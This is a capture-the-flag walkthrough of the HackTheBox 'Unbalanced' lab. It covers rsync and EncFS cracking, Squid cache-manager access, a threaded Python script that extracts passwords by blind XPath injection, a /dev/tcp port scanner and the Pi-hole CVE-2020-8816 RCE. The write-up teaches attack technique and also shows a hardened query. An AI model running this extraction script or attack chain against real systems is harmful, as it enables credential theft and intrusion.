# HackTheBox - Unbalanced

![](/files/-MZr5JyoFATMHgi3gcBJ)

### Nmap scan results (All port scan)

```bash
nmap -sC -sV -oA nmap-allportscan -T4 10.10.10.200
```

![](/files/-MZr5Tky3JYe4L8AIZLb)

{% hint style="info" %}
rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification times and sizes of files.
{% endhint %}

### Setting up the Squid proxy in the browser

Squid is listening on port 3128. Squid is a caching forward proxy, commonly used to filter and cache the web traffic that flows between an internal network and the Internet. I will be using **Foxy Proxy** to point the browser at it.

![](/files/-MZr6KeKOhS50tzvbQRc)

![](/files/-MZr6PinC_oL-Y1gM3d_)

Browsing through the proxy doesn't turn up anything useful, so we move on to rsync enumeration. Read about rsync over [here](https://www.digitalocean.com/community/tutorials/how-to-use-rsync-to-sync-local-and-remote-directories).

### Enumerating the rsync protocol

```bash
# Install the rsync client
apt install rsync
```

A **`goto`** checklist that I always follow - <https://book.hacktricks.xyz/pentesting/873-pentesting-rsync>

We can enumerate shared folders using the following command.

```bash
rsync -av --list-only rsync://10.10.10.200/
```

![](/files/-MZr7RBg9fQ1f8AylhXX)

```bash
rsync -av --list-only rsync://10.10.10.200/conf_backups
```

This command will list all the files present inside **`conf_backups`**.

![](/files/-MZr7k-7hOq_PI6KgRqp)

To copy all the files locally, we create a directory and pull the module into it with the following command.

```bash
mkdir backups
rsync -av rsync://10.10.10.200/conf_backups ./backups
```

![](/files/-MZr8HeqOhuwWZ02IdT-)

### Working with EncFS (FUSE-based cryptographic filesystem)

This directory consists of junk files and a **`.encfs6.xml`** file. [EncFS](https://en.wikipedia.org/wiki/EncFS) is a cryptographic file system that encrypts every file inside a directory; the `.encfs6.xml` file holds the volume's key material, and we need the password to unlock it.

{% embed url="https://linuxconfig.org/how-to-encrypt-directory-with-encfs-on-debian-9-stretch" %}

```bash
# Mounts the encrypted folder, decrypted, at ./decrypt_data (the password is prompted for)
encfs ./encrypted_folder ./decrypt_data
```

We can use [encfs2john.py](https://github.com/truongkma/ctf-tools/blob/master/John/run/encfs2john.py) to turn the `.encfs6.xml` file into a hash and then crack it with **`John`**.

![](/files/-MZr9zrbzx5v7G8Bk2gd)

![](/files/-MZrAEKw_dR7VSEH3IjA)

Now that we have the password, we can mount the directory decrypted.

![](/files/-MZrAq0TFPk1z-vyTRDR)

### Analyzing the squid.conf file

![Bunch of ACL rules](/files/-MZrBJImaH5qYe2vuBSR)

![](/files/-MZrBROvomRhgtFSOnm-)

This one looks interesting, as the ACL allows access to the **`intranet.unbalanced.htb`** domain. The configuration also contains the `cachemgr_passwd` value.

![](/files/-MZrBqDY5xpaIRJxPJle)

### Cache Manager Access Control (SQUID)

![](/files/-MZrCormLs-OeAEbb3RC)

This looks like a login portal for employees. I tried default usernames/passwords and also tried using the previously found passwords, but didn't get anything. Since we have the cache manager password, we can browse Squid's internal cache manager pages.

{% embed url="https://wiki.squid-cache.org/Features/CacheManager" %}

```bash
curl --user ':Thah$Sh1' http://10.10.10.200:3128/squid-internal-mgr/menu
```

![](/files/-MZrDkhpiAvm15R2a9nZ)

We can check the FQDN (**fully qualified domain name**) cache for potential internal IPs and hostnames.

{% hint style="info" %}
The **FQDN cache** is a built-in Squid component that provides hostname to IP address translation and manages the associated data structures. It usually doesn't block on a request, except in special cases where that is desired.
{% endhint %}

![](/files/-MZrEH_2fa0oKxgvpgjh)

These `intranet-hostX.unbalanced.htb` entries are probably the backend hosts of a load balancer. A **load balancer** is a device that acts as a reverse proxy and distributes network or application traffic across a number of servers. **Load balancers** are used to increase capacity (concurrent users) and reliability of applications.

### Found a web page that may be vulnerable

![](/files/-MZrF7QA2EcYQ9BX1RsB)

Checking around the IP addresses, I found this webpage, and it was taken down due to security issues. (Looks interesting and may contain vulnerabilities.) Let's run a gobuster scan against this IP through the Squid proxy.

```bash
gobuster dir --proxy http://10.10.10.200:3128/ -u http://172.31.179.1/ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -x php,html,txt
```

![](/files/-MZrIB1mbQh7jYkGLQSV)

![](/files/-MZrINEQf4MqoAo9LhsV)

This website is responsive, so maybe we can try SQL injection on the login page. I tried using sqlmap to automate the process but didn't get anything.

### Exploiting XPath Injection

This one looks like an XPath injection. We can try the basic authentication bypass payloads from [here](https://book.hacktricks.xyz/pentesting-web/xpath-injection#blind-explotation).

{% embed url="https://book.hacktricks.xyz/pentesting-web/xpath-injection#blind-explotation" %}

![](/files/-MZrKCrW_-AzEa-9kfOm)

![](/files/-MZrKHVSimtG2cxayWBm)

This is definitely XPath injection. We can exploit this with a script to get all the usernames and passwords.

```text
' or Username='rita' and string-length(Password/text())=num and ''='   // To extract the length
' or Username='rita' and substring(Password/text(),{},1)='a' and ''='  // To extract the password
```

```python
#!/usr/bin/env python3

import requests
import threading
import time

url = "http://172.31.179.1/intranet.php"
# Requests go through the Squid proxy on the box so the internal host is reachable
proxies = {'http': 'http://10.10.10.200:3128'}
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Referer": "http://172.31.179.1/intranet.php",
    "Origin": "http://172.31.179.1"
}
# Character set tried at every password position
chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@$"
print(chars)
# users = ['bryan', 'rita', 'sarah', 'jim']

class myThread(threading.Thread):
    """One thread per user: find the password length, then extract it character by character."""
    def __init__(self, threadID, user):
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.user = user
    def run(self):
        pass_length = length_extraction(self.user)
        if pass_length is None:
            print("[-] Could not determine password length for {}".format(self.user))
            return
        password = xpath_injection(self.user, pass_length)
        print("[+] Creds found for {} : {}".format(self.user, password))

# Boolean-blind extraction: the username shows up in the response when the injected predicate is true
def xpath_injection(user, length):
    passwd = ""
    for i in range(1, length + 1):
        for char in chars:
            payload = {
                "Username": "admin",
                "Password": "' or Username='{}' and substring(Password/text(),{},1)='{}' and ''='".format(user, i, char)
            }
            resp = requests.post(url, data=payload, headers=headers, proxies=proxies)
            if user in resp.text:
                passwd += char
                break
    return passwd

# Finds the password length by testing string-length() against each candidate value
def length_extraction(user):
    for i in range(1, 30):
        payload = {
            "Username": "admin",
            "Password": "' or Username='{}' and string-length(Password/text())={} and ''='".format(user, i)
        }
        resp = requests.post(url, data=payload, headers=headers, proxies=proxies)
        if user in resp.text:
            print("[+] Length found: {}".format(i))
            return i
    return None

starttime = time.asctime(time.localtime(time.time()))
print("[+] Script Started at {}".format(starttime))
# One extraction thread per known user
for idx, name in enumerate(["bryan", "rita", "jim", "sarah"], start=1):
    myThread(idx, name).start()
```
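The payloads above work because the login builds its XPath predicate by pasting the form fields into a quoted string. The following is an added example, not the box's intranet.php (which we never see): it models that lookup in Python with lxml against a constructed user store, and shows that binding the fields as XPath variables leaves the same length and substring payloads inert.

```python
# Added example: a model of the vulnerable XPath login beside a hardened version.
# Assumes lxml is installed; the user store and passwords below are constructed.
from lxml import etree

USERS_XML = b"""<Employees>
  <Employee><Username>bryan</Username><Password>hunter22</Password></Employee>
  <Employee><Username>rita</Username><Password>s3cr3tpw</Password></Employee>
</Employees>"""
DOC = etree.fromstring(USERS_XML)

def vulnerable_login(username, password):
    """Builds the predicate by string formatting, so form input becomes XPath code."""
    query = "//Employee[Username='{}' and Password='{}']".format(username, password)
    hits = DOC.xpath(query)
    return hits[0].findtext("Username") if hits else None

def safe_login(username, password):
    """Binds the input as XPath variables ($u, $p): quotes and operators stay data."""
    hits = DOC.xpath("//Employee[Username=$u and Password=$p]", u=username, p=password)
    return hits[0].findtext("Username") if hits else None

# The two payload shapes from the page, built the same way the page's script builds them
def length_probe(user, n):
    return "' or Username='{}' and string-length(Password/text())={} and ''='".format(user, n)

def char_probe(user, pos, ch):
    return "' or Username='{}' and substring(Password/text(),{},1)='{}' and ''='".format(user, pos, ch)

def oracle_says_yes(login, payload):
    """True when the login leaks a 'yes' answer for a boolean-blind probe sent as admin."""
    return login("admin", payload) is not None

if __name__ == "__main__":
    # Against the string-formatted query the probes answer truthfully about rita's password...
    print(oracle_says_yes(vulnerable_login, length_probe("rita", 8)))    # True
    print(oracle_says_yes(vulnerable_login, char_probe("rita", 1, "s")))  # True
    # ...while the variable-bound query treats the whole payload as a literal password.
    print(oracle_says_yes(safe_login, length_probe("rita", 8)))          # False
    print(safe_login("rita", "s3cr3tpw"))                                 # rita
```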

![](/files/-MZrMQv1phCBoAtSDMAG)

### SSH Access as bryan user

![](/files/-MZrMeigUlIhF-zTg-Rj)

```text
# TODO list for the bryan user
############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]

###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]
```

### Discovering Pi-Hole running on docker network

Pi-hole is running on the docker network, so we need to find its IP address. The **`ip neigh`** command lists the neighbours the host has recently talked to.

![](/files/-MZrNhbGjEopJe4Ey0Rr)

**`172.31.11.3`** - Pi-hole might be running on this IP. To check, we can scan its ports with a static nmap binary or with a simple bash script. Pi-hole listens on ports 53 and 80 by default.

```bash
#!/bin/bash
# Minimal TCP port scanner using bash's /dev/tcp pseudo-device (no nmap needed)

ip=$1

if [[ $# -eq 0 ]]; then
        echo "[-] Supply IP Address"
        exit 1
fi

for i in $(seq 1 65535); do
        # The redirect only succeeds when the TCP connect succeeds; errors are silenced
        if echo 1 > "/dev/tcp/$ip/$i" 2>/dev/null; then
                echo "[+] Port open: $i"
        fi
done
```

![](/files/-MZrPYn27o_fhVx7oLkG)

Alternatively, we can use curl to fetch the root page and confirm the web interface.

![](/files/-MZrPgLzzW4LgD2rk30Z)

### Forwarding ports using SSH

Let's forward the ports to our machine.

![](/files/-MZrPwqenTmgMXW-w4gW)

![](/files/-MZrQLd9BuM94nUU9G0e)

### Exploiting Pi-hole RCE (Version 4.3.2)

The TODO note said that admin used a temporary password. I tried **`admin`** as a password and got authenticated. ( **`Pi-hole Version v4.3.2`** )

![](/files/-MZrQw2AXlVq-HNI2RSF)

The **MAC** address input in the admin interface is not validated properly, and in this version it can be abused for arbitrary code execution on the container (CVE-2020-8816).

{% embed url="https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/" %}

![](/files/-MZrSFlcwD1tC7EIJotG)

![](/files/-MZrSMbrGK4Kp4GxzdGA)

![](/files/-MZrSTBuG3AbrnSBjbhN)

The Pi-hole admin interface password is reused for root on the host machine, which gives us root access.

![](/files/-MZrSbi20lrqfvgm1Dkd)
